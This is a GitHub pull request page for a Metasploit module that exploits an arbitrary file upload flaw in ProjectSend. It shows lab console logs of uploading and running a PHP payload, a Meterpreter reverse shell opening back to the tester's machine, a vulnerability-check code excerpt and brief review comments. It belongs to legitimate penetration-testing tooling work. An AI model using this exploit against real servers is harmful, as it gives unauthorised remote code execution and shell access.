Add ProjectSend Arbitrary File Upload module #4459

Merged
merged 1 commit into from Dec 26, 2014

Projects

None yet

3 participants

@bcoles
Contributor
bcoles commented Dec 23, 2014

Add ProjectSend Arbitrary File Upload module

Check

msf > use exploit/unix/webapp/projectsend_upload_exec
msf exploit(projectsend_upload_exec) > set RHOST 10.6.6.55
RHOST => 10.6.6.55
msf exploit(projectsend_upload_exec) > check
[*] 10.6.6.55:80 - The target is not exploitable.
msf exploit(projectsend_upload_exec) > set verbose true
verbose => true
msf exploit(projectsend_upload_exec) > set targeturi /ProjectSend-r561/ 
targeturi => /ProjectSend-r561/
msf exploit(projectsend_upload_exec) > check
[+] 10.6.6.55:80 - The target is vulnerable.

Run

msf exploit(projectsend_upload_exec) > run

[*] Started reverse handler on 10.6.6.66:4444 
[*] 10.6.6.55:80 - Uploading file 'YA577D9ea8L44gf.php' (1796 bytes)
[+] 10.6.6.55:80 - Payload uploaded successfully (YA577D9ea8L44gf.php)
[*] 10.6.6.55:80 - Executing upload/files/YA577D9ea8L44gf.php...
[*] Sending stage (40551 bytes) to 10.6.6.55
[*] Meterpreter session 1 opened (10.6.6.66:4444 -> 10.6.6.55:58917) at 2014-12-20 13:25:45 -0500
[+] Deleted YA577D9ea8L44gf.php
^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
@wchen-r7 wchen-r7 commented on the diff Dec 23, 2014
modules/exploits/unix/webapp/projectsend_upload_exec.rb
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'process-upload.php')
+ )
+ if !res
+ vprint_error("#{peer} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ elsif res.code.to_i == 404
+ vprint_error("#{peer} - No process-upload.php found")
+ return Exploit::CheckCode::Safe
+ elsif res.code.to_i == 500
+ vprint_error("#{peer} - Unable to write file")
+ return Exploit::CheckCode::Safe
+ elsif res.code.to_i == 200 && res.body =~ /<\?php/
+ vprint_error("#{peer} - File process-upload.php is not executable")
+ return Exploit::CheckCode::Safe
+ elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
@wchen-r7
wchen-r7 Dec 23, 2014 Contributor

Is this supposed to be /sys\.config\.php/ or actually /sys.config.php/ ?

@bcoles
bcoles Dec 23, 2014 Contributor

The former; /sys\.config\.php/

@wchen-r7 wchen-r7 added the module label Dec 24, 2014
@jvazquez-r7 jvazquez-r7 self-assigned this Dec 26, 2014
@jvazquez-r7
Contributor

testing...

@jvazquez-r7 jvazquez-r7 merged commit 5c82b8a into rapid7:master Dec 26, 2014

1 check passed

continuous-integration/travis-ci The Travis CI build passed
Details
@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Dec 26, 2014
@jvazquez-r7 jvazquez-r7 Land #4459, @bcoles's ProjectSend Arbitrary File Upload module 2bed52d
@jvazquez-r7
Contributor

Did minor cleanup here: b5b0be9

Test:

msf exploit(projectsend_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
Land #4459, @bcoles's ProjectSend Arbitrary File Upload module
[*] 172.16.158.137:80 - Uploading file 'xozXXw1.php' (1794 bytes)
[+] 172.16.158.137:80 - Payload uploaded successfully (xozXXw1.php)
[*] 172.16.158.137:80 - Executing upload/files/xozXXw1.php...
[*] Sending stage (40499 bytes) to 172.16.158.137
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.137:38949) at 2014-12-26 11:23:44 -0600
[+] Deleted xozXXw1.php
[*] 172.16.158.137:80 - Request timed out while executing

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

thanks @bcoles ! landed

@bcoles bcoles deleted the bcoles:projectsend_upload_exec branch May 5, 2015
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment